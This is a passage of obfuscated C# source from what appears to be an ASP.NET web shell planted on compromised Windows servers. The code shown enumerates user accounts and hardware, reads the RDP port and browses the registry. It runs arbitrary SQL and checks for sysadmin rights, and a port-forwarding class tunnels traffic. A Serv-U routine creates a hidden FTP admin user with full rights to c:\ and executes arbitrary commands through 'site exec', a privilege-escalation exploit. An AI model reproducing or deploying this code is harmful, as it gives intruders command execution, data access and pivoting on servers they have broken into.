  975. tr.Controls.Add(td);
  976. }
  977. }
  978. vHCs.Controls.Add(tr);
  979. }
  980. }
  981. catch(Exception error)
  982. {
  983. oHpF();
  984. }
  985. }
  986. public void PLd()
  987. {
  988. try
  989. {
  990. WICxe();
  991. xWVQ.Visible=true;
  992. Bin_H2_Title.InnerText="User Information >>";
  993. DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
  994. foreach(DirectoryEntry child in TWQ.Children)
  995. {
  996. foreach(string name in child.Properties.PropertyNames)
  997. {
  998. PropertyValueCollection pvc=child.Properties[name];
  999. int c=pvc.Count;
  1000. for(int i=0;i<c;i++)
  1001. {
  1002. if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
  1003. {
  1004. string bg=OKM();
  1005. TableRow tr=new TableRow();
  1006. tr.Attributes["onmouseover"]="this.className='focus';";
  1007. tr.CssClass=bg;
  1008. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1009. TableCell td=new TableCell();
  1010. td.Text=name;
  1011. tr.Controls.Add(td);
  1012. TableCell td1=new TableCell();
  1013. td1.Text=pvc[i].ToString();
  1014. tr.Controls.Add(td1);
  1015. VPa.Controls.Add(tr);
  1016. }
  1017. }
  1018. }
  1019. TableRow trn=new TableRow();
  1020. for(int x=1;x<3;x++)
  1021. {
  1022. TableCell tdn=new TableCell();
  1023. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
  1024. trn.Controls.Add(tdn);
  1025. VPa.Controls.Add(trn);
  1026. }
  1027. }
  1028. }
  1029. catch(Exception error)
  1030. {
  1031. xseuB(error.Message);
  1032. }
  1033. }
  1034. public void iLVUT()
  1035. {
  1036. try
  1037. {
  1038. WICxe();
  1039. xWVQ.Visible=true;
  1040. Bin_H2_Title.InnerText="User Information >>";
  1041. DataTable user=cCf("Win32_UserAccount");
  1042. for(int i=0;i<user.Rows.Count;i++)
  1043. {
  1044. for(int j=0;j<user.Columns.Count;j++)
  1045. {
  1046. string bg=OKM();
  1047. TableRow tr=new TableRow();
  1048. tr.Attributes["onmouseover"]="this.className='focus';";
  1049. tr.CssClass=bg;
  1050. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1051. TableCell td=new TableCell();
  1052. td.Text=user.Columns[j].ToString();
  1053. tr.Controls.Add(td);
  1054. TableCell td1=new TableCell();
  1055. td1.Text=user.Rows[i][j].ToString();
  1056. tr.Controls.Add(td1);
  1057. VPa.Controls.Add(tr);
  1058. }
  1059. TableRow trn=new TableRow();
  1060. for(int x=1;x<3;x++)
  1061. {
  1062. TableCell tdn=new TableCell();
  1063. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
  1064. trn.Controls.Add(tdn);
  1065. VPa.Controls.Add(trn);
  1066. }
  1067. }
  1068. }
  1069. catch(Exception error)
  1070. {
  1071. PLd();
  1072. }
  1073. }
  1074. public void pDVM()
  1075. {
  1076. try
  1077. {
  1078. RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp");
  1079. string IKjwH=DdmPl(EeZ,"PortNumber");
  1080. RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor");
  1081. int cpu=izN.SubKeyCount;
  1082. RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\");
  1083. string NPPZ=DdmPl(mQII,"ProcessorNameString");
  1084. WICxe();
  1085. ghaB.Visible=true;
  1086. Bin_H2_Title.InnerText="System Information >>";
  1087. Bin_H2_Mac.InnerText="MAC Information >>";
  1088. Bin_H2_Driver.InnerText="Driver Information >>";
  1089. StringBuilder yEwc=new StringBuilder();
  1090. StringBuilder hwJeS=new StringBuilder();
  1091. StringBuilder jXkaE=new StringBuilder();
  1092. yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>");
  1093. yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>");
  1094. yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>");
  1095. yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>");
  1096. yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>");
  1097. yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>");
  1098. yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>");
  1099. yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>");
  1100. DataTable BIOS=cCf("Win32_BIOS");
  1101. yEwc.Append("<li><u>Server BIOS : </u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>");
  1102. yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>");
  1103. yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>");
  1104. DataTable upM=cCf("Win32_PhysicalMemory");
  1105. Int64 oZnZV=0;
  1106. for(int i=0;i<upM.Rows.Count;i++)
  1107. {
  1108. oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString());
  1109. }
  1110. yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>");
  1111. DataTable dOza=cCf("Win32_NetworkAdapterConfiguration");
  1112. for(int i=0;i<dOza.Rows.Count;i++)
  1113. {
  1114. hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>");
  1115. if(dOza.Rows[i]["MACAddress"]!=string.Empty)
  1116. {
  1117. hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>");
  1118. }
  1119. }
  1120. DataTable Driver=cCf("Win32_SystemDriver");
  1121. for (int i=0; i<Driver.Rows.Count; i++)
  1122. {
  1123. jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> ");
  1124. if (Driver.Rows[i]["PathName"]!=string.Empty)
  1125. {
  1126. jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);
  1127. }
  1128. else
  1129. {
  1130. jXkaE.Append("No path information");
  1131. }
  1132. jXkaE.Append("</li>");
  1133. }
  1134. Bin_Ul_Sys.InnerHtml=yEwc.ToString();
  1135. Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();
  1136. Bin_Ul_Driver.InnerHtml=jXkaE.ToString();
  1137. }
  1138. catch(Exception error)
  1139. {
  1140. xseuB(error.Message);
  1141. }
  1142. }
  1143. public void ADCpk()
  1144. {
  1145. WICxe();
  1146. APl.Visible=true;
  1147. Bin_H2_Title.InnerText="Serv-U Exec >>";
  1148. }
  1149. public void lDODR()
  1150. {
  1151. string JGGg=string.Empty;
  1152. string user=dNohJ.Value;
  1153. string pass=NMd.Value;
  1154. int port=Int32.Parse(HlQl.Value);
  1155. string cmd=mHbjB.Value;
  1156. string CRtK="user "+user+"\r\n";
  1157. string jnNG="pass "+pass+"\r\n";
  1158. string site="SITE MAINTENANCE\r\n";
  1159. string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
  1160. string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
  1161. string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
  1162. string zexn="QUIT\r\n";
  1163. UHlA.Visible=true;
  1164. try
  1165. {
  1166. tcp.Connect("127.0.0.1",port);
  1167. tcp.ReceiveBufferSize=1024;
  1168. NS=tcp.GetStream();
  1169. Rev(NS);
  1170. ZJiM(NS,CRtK);
  1171. Rev(NS);
  1172. ZJiM(NS,jnNG);
  1173. Rev(NS);
  1174. ZJiM(NS,site);
  1175. Rev(NS);
  1176. ZJiM(NS,mtoJb);
  1177. Rev(NS);
  1178. ZJiM(NS,sutI);
  1179. Rev(NS);
  1180. ZJiM(NS,iVDT);
  1181. Rev(NS);
  1182. Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";
  1183. zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);
  1184. NS1=zvxm.GetStream();
  1185. Rev(NS1);
  1186. ZJiM(NS1,"user bin\r\n");
  1187. Rev(NS1);
  1188. ZJiM(NS1,"pass binftp\r\n");
  1189. Rev(NS1);
  1190. ZJiM(NS1,"site exec "+cmd+"\r\n");
  1191. Rev(NS1);
  1192. ZJiM(NS1,"quit\r\n");
  1193. Rev(NS1);
  1194. zvxm.Close();
  1195. ZJiM(NS,mtoJb);
  1196. Rev(NS);
  1197. tcp.Close();
  1198. }
  1199. catch(Exception error)
  1200. {
  1201. xseuB(error.Message);
  1202. }
  1203. }
  1204. protected void Rev(NetworkStream instream)
  1205. {
  1206. string FTBtf=string.Empty;
  1207. if(instream.CanRead)
  1208. {
  1209. byte[] uPZ=new byte[1024];
  1210. do
  1211. {
  1212. System.Threading.Thread.Sleep(50);
  1213. int len=instream.Read(uPZ,0,uPZ.Length);
  1214. FTBtf+=Encoding.Default.GetString(uPZ,0,len);
  1215. }
  1216. while(instream.DataAvailable);
  1217. }
  1218. Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";
  1219. }
  1220. protected void ZJiM(NetworkStream instream,string Sendstr)
  1221. {
  1222. if(instream.CanWrite)
  1223. {
  1224. byte[] uPZ=Encoding.Default.GetBytes(Sendstr);
  1225. instream.Write(uPZ,0,uPZ.Length);
  1226. }
  1227. Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";
  1228. }
  1229. public void xFhz()
  1230. {
  1231. WICxe();
  1232. kkHN.Visible=true;
  1233. Bin_H2_Title.InnerText="RegShell >>";
  1234. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
  1235. vyX.Text="";
  1236. foreach(string rootkey in txc.Split('|'))
  1237. {
  1238. vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | ";
  1239. }
  1240. lFAvw();
  1241. }
  1242. protected void lFAvw()
  1243. {
  1244. qPdI.Text="";
  1245. string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";
  1246. TableRow tr;
  1247. TableCell tc;
  1248. foreach(string rootkey in txc.Split('|'))
  1249. {
  1250. tr=new TableRow();
  1251. tc=new TableCell();
  1252. string bg=OKM();
  1253. tr.Attributes["onmouseover"]="this.className='focus';";
  1254. tr.CssClass=bg;
  1255. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1256. tc.Width=Unit.Parse("40%");
  1257. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>";
  1258. tr.Cells.Add(tc);
  1259. tc=new TableCell();
  1260. tc.Width=Unit.Parse("60%");
  1261. tc.Text="&lt;RootKey&gt;";
  1262. tr.Cells.Add(tc);
  1263. pLWD.Rows.Add(tr);
  1264. }
  1265. }
  1266. protected void tpRQ(string Reg_Path)
  1267. {
  1268. if(!Reg_Path.EndsWith("\\"))
  1269. {
  1270. Reg_Path=Reg_Path+"\\";
  1271. }
  1272. qPdI.Text=Reg_Path;
  1273. string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");
  1274. cJG=Regex.Replace(cJG,@"\\+","\\");
  1275. TableRow tr=new TableRow();
  1276. TableCell tc=new TableCell();
  1277. string bg=OKM();
  1278. tr.Attributes["onmouseover"]="this.className='focus';";
  1279. tr.CssClass=bg;
  1280. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1281. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>";
  1282. tc.Attributes["colspan"]="2" ;
  1283. tr.Cells.Add(tc);
  1284. pLWD.Rows.Add(tr);
  1285. try
  1286. {
  1287. string subpath;
  1288. string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);
  1289. RegistryKey rk=null;
  1290. RegistryKey sk;
  1291. if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))
  1292. {
  1293. rk=Registry.LocalMachine;
  1294. }
  1295. else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))
  1296. {
  1297. rk=Registry.ClassesRoot;
  1298. }
  1299. else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))
  1300. {
  1301. rk=Registry.CurrentUser;
  1302. }
  1303. else if(Reg_Path.StartsWith("HKEY_USERS"))
  1304. {
  1305. rk=Registry.Users;
  1306. }
  1307. else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))
  1308. {
  1309. rk=Registry.CurrentConfig;
  1310. }
  1311. if(kDgkX.Length>1)
  1312. {
  1313. sk=rk.OpenSubKey(kDgkX);
  1314. }
  1315. else
  1316. {
  1317. sk=rk;
  1318. }
  1319. foreach(string innerSubKey in sk.GetSubKeyNames())
  1320. {
  1321. tr=new TableRow();
  1322. tc=new TableCell();
  1323. bg=OKM();
  1324. tr.Attributes["onmouseover"]="this.className='focus';";
  1325. tr.CssClass=bg;
  1326. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1327. tc.Width=Unit.Parse("40%");
  1328. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>";
  1329. tr.Cells.Add(tc);
  1330. tc=new TableCell();
  1331. tc.Width=Unit.Parse("60%");
  1332. tc.Text="&lt;SubKey&gt;";
  1333. tr.Cells.Add(tc);
  1334. pLWD.Rows.Add(tr);
  1335. }
  1336. TableRow cKVA=new TableRow();
  1337. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
  1338. cKVA.Attributes["bgcolor"]="#dddddd";
  1339. TableCell JlmW=new TableCell();
  1340. JlmW.Attributes["colspan"]="2" ;
  1341. JlmW.Attributes["height"]="5";
  1342. cKVA.Cells.Add(JlmW);
  1343. pLWD.Rows.Add(cKVA);
  1344. foreach(string strValueName in sk.GetValueNames())
  1345. {
  1346. tr=new TableRow();
  1347. tc=new TableCell();
  1348. bg=OKM();
  1349. tr.Attributes["onmouseover"]="this.className='focus';";
  1350. tr.CssClass=bg;
  1351. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
  1352. tc.Width=Unit.Parse("40%");
  1353. tc.Text=strValueName;
  1354. tr.Cells.Add(tc);
  1355. tc=new TableCell();
  1356. tc.Width=Unit.Parse("60%");
  1357. tc.Text=DdmPl(sk,strValueName);
  1358. tr.Cells.Add(tc);
  1359. pLWD.Rows.Add(tr);
  1360. }
  1361. }
  1362. catch(Exception error)
  1363. {
  1364. xseuB(error.Message);
  1365. }
  1366. }
  1367. public string DdmPl(RegistryKey sk,string strValueName)
  1368. {
  1369. object uPZ;
  1370. string RaTGr="";
  1371. try
  1372. {
  1373. uPZ=sk.GetValue(strValueName,"NULL");
  1374. if(uPZ.GetType()==typeof(byte[]))
  1375. {
  1376. foreach(byte tmpbyte in(byte[])uPZ)
  1377. {
  1378. if((int)tmpbyte<16)
  1379. {
  1380. RaTGr+="0";
  1381. }
  1382. RaTGr+=tmpbyte.ToString("X");
  1383. }
  1384. }
  1385. else if(uPZ.GetType()==typeof(string[]))
  1386. {
  1387. foreach(string tmpstr in(string[])uPZ)
  1388. {
  1389. RaTGr+=tmpstr;
  1390. }
  1391. }
  1392. else
  1393. {
  1394. RaTGr=uPZ.ToString();
  1395. }
  1396. }
  1397. catch(Exception error)
  1398. {
  1399. xseuB(error.Message);
  1400. }
  1401. return RaTGr;
  1402. }
  1403. public void vNCHZ()
  1404. {
  1405. WICxe();
  1406. YwLB.Visible=true;
  1407. Bin_H2_Title.InnerText="PortScan >>";
  1408. }
  1409. public void rAhe()
  1410. {
  1411. WICxe();
  1412. iDgmL.Visible=true;
  1413. dQIIF.Visible=false;
  1414. Bin_H2_Title.InnerText="DataBase >>";
  1415. }
  1416. protected void OUj()
  1417. {
  1418. if(Dtdr.State==ConnectionState.Closed)
  1419. {
  1420. try
  1421. {
  1422. Dtdr.ConnectionString=MasR.Text;
  1423. Kkvb.Connection=Dtdr;
  1424. Dtdr.Open();
  1425. }
  1426. catch(Exception Error)
  1427. {
  1428. xseuB(Error.Message);
  1429. }
  1430. }
  1431. }
  1432. protected void fUzE()
  1433. {
  1434. if(Dtdr.State==ConnectionState.Open)
  1435. Dtdr.Close();
  1436. Dtdr.Dispose();
  1437. Kkvb.Dispose();
  1438. }
  1439. public DataTable CYUe(string sqlstr)
  1440. {
  1441. OleDbDataAdapter da=new OleDbDataAdapter();
  1442. DataTable Dstog=new DataTable();
  1443. try
  1444. {
  1445. OUj();
  1446. Kkvb.CommandType=CommandType.Text;
  1447. Kkvb.CommandText=sqlstr;
  1448. da.SelectCommand=Kkvb;
  1449. da.Fill(Dstog);
  1450. }
  1451. catch(Exception)
  1452. {
  1453. }
  1454. finally
  1455. {
  1456. fUzE();
  1457. }
  1458. return Dstog;
  1459. }
  1460. public DataTable[] Bin_Data(string query)
  1461. {
  1462. ArrayList list=new ArrayList();
  1463. try
  1464. {
  1465. string str;
  1466. OUj();
  1467. query=query+"\r\n";
  1468. MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);
  1469. int EmRX=0;
  1470. for(int i=0;i<gcod.Count;i++)
  1471. {
  1472. Match FJD=gcod[i];
  1473. str=query.Substring(EmRX,FJD.Index-EmRX);
  1474. if(str.Trim().Length>0)
  1475. {
  1476. OleDbDataAdapter FgzeQ=new OleDbDataAdapter();
  1477. Kkvb.CommandType=CommandType.Text;
  1478. Kkvb.CommandText=str.Trim();
  1479. FgzeQ.SelectCommand=Kkvb;
  1480. DataSet cDPp=new DataSet();
  1481. FgzeQ.Fill(cDPp);
  1482. for(int j=0;j<cDPp.Tables.Count;j++)
  1483. {
  1484. list.Add(cDPp.Tables[j]);
  1485. }
  1486. }
  1487. EmRX=FJD.Index+3;
  1488. }
  1489. str=query.Substring(EmRX,query.Length-EmRX);
  1490. if(str.Trim().Length>0)
  1491. {
  1492. OleDbDataAdapter VwB=new OleDbDataAdapter();
  1493. Kkvb.CommandType=CommandType.Text;
  1494. Kkvb.CommandText=str.Trim();
  1495. VwB.SelectCommand=Kkvb;
  1496. DataSet arG=new DataSet();
  1497. VwB.Fill(arG);
  1498. for(int k=0;k<arG.Tables.Count;k++)
  1499. {
  1500. list.Add(arG.Tables[k]);
  1501. }
  1502. }
  1503. }
  1504. catch(SqlException e)
  1505. {
  1506. xseuB(e.Message);
  1507. rom.Visible=false;
  1508. }
  1509. return(DataTable[])list.ToArray(typeof(DataTable));
  1510. }
  1511. public void JIAKU(string instr)
  1512. {
  1513. try
  1514. {
  1515. OUj();
  1516. Kkvb.CommandType=CommandType.Text;
  1517. Kkvb.CommandText=instr;
  1518. Kkvb.ExecuteNonQuery();
  1519. }
  1520. catch(Exception e)
  1521. {
  1522. xseuB(e.Message);
  1523. }
  1524. }
  1525. public void dwgT()
  1526. {
  1527. try
  1528. {
  1529. OUj();
  1530. if(WYmo.SelectedItem.Text=="MSSQL")
  1531. {
  1532. if(Pvf.SelectedItem.Value!="")
  1533. {
  1534. Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());
  1535. }
  1536. }
  1537. DataTable[] jxF=null;
  1538. jxF=Bin_Data(jHIy.InnerText);
  1539. if(jxF!=null && jxF.Length>0)
  1540. {
  1541. for(int j=0;j<jxF.Length;j++)
  1542. {
  1543. rom.PreRender+=new EventHandler(lRavM);
  1544. rom.DataSource=jxF[j];
  1545. rom.DataBind();
  1546. for(int i=0;i<rom.Items.Count;i++)
  1547. {
  1548. string bg=OKM();
  1549. rom.Items[i].CssClass=bg;
  1550. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
  1551. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
  1552. }
  1553. }
  1554. }
  1555. else
  1556. {
  1557. rom.DataSource=null;
  1558. rom.DataBind();
  1559. }
  1560. rom.Visible=true;
  1561. }
  1562. catch(Exception e)
  1563. {
  1564. xseuB(e.Message);
  1565. rom.Visible=false;
  1566. }
  1567. }
  1568. public void xTZY()
  1569. {
  1570. try
  1571. {
  1572. if(WYmo.SelectedItem.Text=="MSSQL")
  1573. {
  1574. if(Pvf.SelectedItem.Value=="")
  1575. {
  1576. rom.DataSource=null;
  1577. rom.DataBind();
  1578. return;
  1579. }
  1580. }
  1581. OUj();
  1582. DataTable zKvOw=new DataTable();
  1583. DataTable jxF=new DataTable();
  1584. DataTable baVJV=new DataTable();
  1585. if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")
  1586. {
  1587. Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);
  1588. }
  1589. zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });
  1590. jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });
  1591. foreach(DataRow dr in zKvOw.Rows)
  1592. {
  1593. jxF.ImportRow(dr);
  1594. }
  1595. jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");
  1596. rom.PreRender+=new EventHandler(lRavM);
  1597. rom.DataSource=jxF;
  1598. rom.DataBind();
  1599. for(int i=0;i<rom.Items.Count;i++)
  1600. {
  1601. string bg=OKM();
  1602. rom.Items[i].CssClass=bg;
  1603. rom.Items[i].Attributes["onmouseover"]="this.className='focus';";
  1604. rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';";
  1605. }
  1606. rom.Visible=true;
  1607. }
  1608. catch(Exception e)
  1609. {
  1610. xseuB(e.Message);
  1611. rom.Visible=false;
  1612. }
  1613. }
  1614. private void lRavM(object sender,EventArgs e)
  1615. {
  1616. DataGrid d=(DataGrid)sender;
  1617. foreach(DataGridItem item in d.Items)
  1618. {
  1619. foreach(TableCell t in item.Cells)
  1620. {
  1621. t.Text=t.Text.Replace("<","&lt;").Replace(">","&gt;");
  1622. }
  1623. }
  1624. }
  1625. public void vCf()
  1626. {
  1627. dQIIF.Visible=true;
  1628. try
  1629. {
  1630. jHIy.InnerHtml=string.Empty;
  1631. if(WYmo.SelectedItem.Text=="MSSQL")
  1632. {
  1633. rom.Visible=false;
  1634. uXevN.Visible=true;
  1635. irTU.Visible=true;
  1636. OUj();
  1637. DataTable ver=CYUe(@"SELECT @@VERSION");
  1638. DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");
  1639. DataTable cdb=CYUe(@"SELECT DB_NAME()");
  1640. DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
  1641. DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')");
  1642. string jHlh=ver.Rows[0][0].ToString();
  1643. string dbo=string.Empty;
  1644. if(YKrm.Rows[0][0].ToString()=="1")
  1645. {
  1646. dbo="db_owner";
  1647. }
  1648. else
  1649. {
  1650. dbo="public";
  1651. }
  1652. if(rol.Rows[0][0].ToString()=="1")
  1653. {
  1654. dbo="<font color=blue>sa</font>";
  1655. }
  1656. string db_name=string.Empty;
  1657. foreach(ListItem item in FGEy.Items)
  1658. {
  1659.  if(item.Selected=true)
  1660.  {
  1661.  item.Selected=false;
  1662.  }
  1663. }
  1664. Pvf.Items.Clear();
  1665. Pvf.Items.Add("-- Select a DataBase --");
  1666. Pvf.Items[0].Value="";
  1667. for(int i=0;i<dbs.Rows.Count;i++)
  1668. {
  1669. db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+"&nbsp;|&nbsp;";
  1670. Pvf.Items.Add(dbs.Rows[i][0].ToString());
  1671. }
  1672. irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";
  1673. }
  1674. else
  1675. {
  1676. uXevN.Visible=false;
  1677. irTU.Visible=false;
  1678. xTZY();
  1679. }
  1680. }
  1681. catch(Exception e)
  1682. {
  1683. dQIIF.Visible=false;
  1684. }
  1685. }
  1686. public void MHLv()
  1687. {
  1688. WICxe();
  1689. hOWTm.Visible=true;
  1690. Bin_H2_Title.InnerText="PortMap >>";
  1691. }
  1692. public class PortForward
  1693. {
  1694. public string Localaddress;
  1695. public int LocalPort;
  1696. public string RemoteAddress;
  1697. public int RemotePort;
  1698. string type;
  1699. Socket ltcpClient;
  1700. Socket rtcpClient;
  1701. Socket server;
  1702. byte[] DPrPL=new byte[2048];
  1703. byte[] wvZv=new byte[2048];
  1704. public struct session
  1705. {
  1706. public Socket rdel;
  1707. public Socket ldel;
  1708. public int llen;
  1709. public int rlen;
  1710. }
  1711. public static IPEndPoint mtJ(string host,int port)
  1712. {
  1713. IPEndPoint iep=null;
  1714. IPHostEntry aGN=Dns.Resolve(host);
  1715. IPAddress rmt=aGN.AddressList[0];
  1716. iep=new IPEndPoint(rmt,port);
  1717. return iep;
  1718. }
  1719. public void Start(string Rip,int Rport,string lip,int lport)
  1720. {
  1721. try
  1722. {
  1723. LocalPort=lport;
  1724. RemoteAddress=Rip;
  1725. RemotePort=Rport;
  1726. Localaddress=lip;
  1727. rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
  1728. ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);
  1729. rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);
  1730. }
  1731. catch (Exception ex) { }
  1732. }
  1733. protected void iiGFO(IAsyncResult ar)
  1734. {
  1735. try
  1736. {
  1737. session RKXy=new session();
  1738. RKXy.ldel=ltcpClient;
  1739. RKXy.rdel=rtcpClient;
  1740. ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);
  1741. }
  1742. catch (Exception ex) { }
  1743. }
  1744. protected void VTp(IAsyncResult ar)
  1745. {
  1746. try
  1747. {
  1748. session RKXy=(session)ar.AsyncState;
  1749. ltcpClient.EndConnect(ar);
  1750. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);
  1751. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);
  1752. }
  1753. catch (Exception ex) { }
  1754. }
  1755. private void LFYM(IAsyncResult ar)
  1756. {
  1757. try
  1758. {
  1759. session RKXy=(session)ar.AsyncState;
  1760. int Ret=RKXy.rdel.EndReceive(ar);
  1761. if (Ret>0)
  1762. ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);
  1763. else lyTOK();
  1764. }
  1765. catch (Exception ex) { }
  1766. }
  1767. private void JTcp(IAsyncResult ar)
  1768. {
  1769. try
  1770. {
  1771. session RKXy=(session)ar.AsyncState;
  1772. RKXy.ldel.EndSend(ar);
  1773. RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);
  1774. }
  1775. catch (Exception ex) { }
  1776. }
  1777. private void xPS(IAsyncResult ar)
  1778. {
  1779. try
  1780. {
  1781. session RKXy=(session)ar.AsyncState;
  1782. int Ret=RKXy.ldel.EndReceive(ar);
  1783. if (Ret>0)
  1784. RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);
  1785. else lyTOK();
  1786. }
  1787. catch (Exception ex) { }
  1788. }
  1789. private void IZU(IAsyncResult ar)
  1790. {
  1791. try
  1792. {
  1793. session RKXy=(session)ar.AsyncState;
  1794. RKXy.rdel.EndSend(ar);
  1795. RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);
  1796. }
  1797. catch (Exception ex) { }
  1798. }
  1799. public void lyTOK()
  1800. {
  1801. try
  1802. {
  1803. if (ltcpClient!=null)
  1804. {
  1805. ltcpClient.Close();
  1806. }
  1807. if (rtcpClient!=null)
  1808. rtcpClient.Close();
  1809. }
  1810. catch (Exception ex) { }
  1811. }
  1812. }
  1813. protected void vuou()
  1814. {
